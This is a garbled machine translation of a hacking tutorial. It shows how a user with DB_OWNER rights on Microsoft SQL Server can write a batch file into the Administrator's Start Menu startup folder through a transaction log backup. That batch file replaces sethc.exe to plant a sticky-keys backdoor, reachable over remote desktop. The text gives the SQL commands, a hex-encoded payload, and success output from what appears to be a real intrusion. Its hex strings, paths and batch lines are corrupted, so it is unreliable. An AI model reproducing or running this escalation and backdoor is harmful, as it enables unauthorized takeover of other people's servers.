Uses Differential backup DB_OWNER to escalate Permissions

Author: Pepsi Original: http://jifan.org/post/525

DB_OWNER permission obtained

Think of differential backup

Exec master .. xp_dirtree c:, 1, 1

Column directory

/* Back up a sentence or Bat using the Url or SQL queryserver Log */

 

Alter database [master] set recovery full --
Create table cmd (a image )--
Backup log [master] to disk = c: cmd1 with init --
Insert into cmd (a) values (values

Bytes

Bytes

Bytes

C646c63616109655c73657468632e657865202f790d0a )--
Backup log [master] to disk = C: Documents and SettingsAdministrator "start" Menu \ Program start \ start. bat --
Drop table cmd --

Analyze statements

First sentence

Alter database [master] set recovery full --

The master database name is used. Generally, the database permission cannot be changed.

Create table cmd (a image )--

This statement creates a table with a column in the table. The data type of the column is image.

Backup log [master] to disk = c: cmd1 with init --

This is the log in the backup database master to c: cmd1.

 

Insert into cmd (a) values (values

Bytes

Bytes

Bytes

C73657468632E657865202F790D0A )--

This statement inserts data into the cmd column a of the created table.

Bytes

Bytes

Bytes

Bytes

5C73657468632E657865202F790D0A

Hexadecimal Batch Processing

Processing original is

@ Echo off
@ Cd % windir %
@ Del dir/s/a sethc.exe
@ Copy %windir?system32=.exe %windir=system32sethc.exe/y
@ Copy %windir?system32=.exe %windir=system32dllcachesethc.exe/y

Backup log [master] to disk = C: Documents and SettingsAdministrator "start" Menu \ Program start \ start. bat --

This is the log to the startup Item start. bat of the backup database master.

Batch Processing

Drop table cmd --

Delete table

Then wait for management login 3389 to start

My problems are:

Time when the second sentence is executed

Create table cmd (a image )--

The master prompts that no permission is available for rejection.
You cannot give up without the permission to create a table.
I have the db permission. If you find a blank box, OK. No

Find a non-data

Two commands are used here.

Delete column

Alter table Name drop column name

Add Column

Alter table name ADD column name VARCHAR (20)

I first deleted all columns in test.

Then execute

Alter table test ADD

Then the command used is

Alter table
Statement

I found several instances online

Reference
-- Try
Create table
(
Name nvarchar (45 ),
Price decimal (19,4 ),
Charge varchar (10)
)
1. The length of the nvarchar type is changed to 60.
Alter table
Alter column name nvarchar (60)
2. The default value of the decimail type is 0, and 2 digits are retained after the decimal point.
-- If the default value already exists, delete it first and then add the delete constraint name
Alter table
Add constraint df_a_price default 0 for price

Alter table
Alter column price decimal (19,2)
3. Change the varchar column type to Nvarchar.
Alter table
Alter column charge nvarchar (60)

What I am running here is

Alter table [test]. [dbo]. [test]
Alter column a image

The data type of column a in the test table of the database is changed to image.

Then change the command slightly.

Alter database [test] set recovery full --
Backup log [test] to disk = c: cmd1 with init --
Insert into test (a) values (values

Bytes

Bytes

Bytes

C63616109655c73657468632e657865202f790d0a )--
Backup log [test] to disk = C: Documents and Settingsadministrator start Menu \ Program start \ start. bat --

Return if execution is successful

Reference
Two pages have been processed. These pages belong to the test_Log file of the database test (located on file 1 ).
The backup log operation successfully processed two pages and took 0.125 seconds (0.081 MB/second ).

(The number of affected rows is 1)

One page has been processed, which belongs to the test_Log file of the database test (located on file 1 ).
The backup log operation successfully processed one page and took 0.095 seconds (0.037 MB/second ).

OK

You can see that this is successful, and then you can see

Exec master.. xp_dirtree C: Documents and Settingsadministrator Start Menu \ Program start \,

Then return

 

Succeeded
Haha wait for management
I am a dumb here. I have been testing on the local machine for a long time. I have backed up some databases and cannot write commands in batches.
That's useless.

This is successful.

Daniel bypassed him. He wanted to give up at the beginning, but he tried to find out what he didn't know. Hey, it's really done.
This is not easy. His 1433 is only open to one server. I spent a lot of money to deal with it. Then a friend wrote a dll (Port ing, system service, comparison, on 3389, it is easy to find ).
In this case, the table is copied and can be tested locally.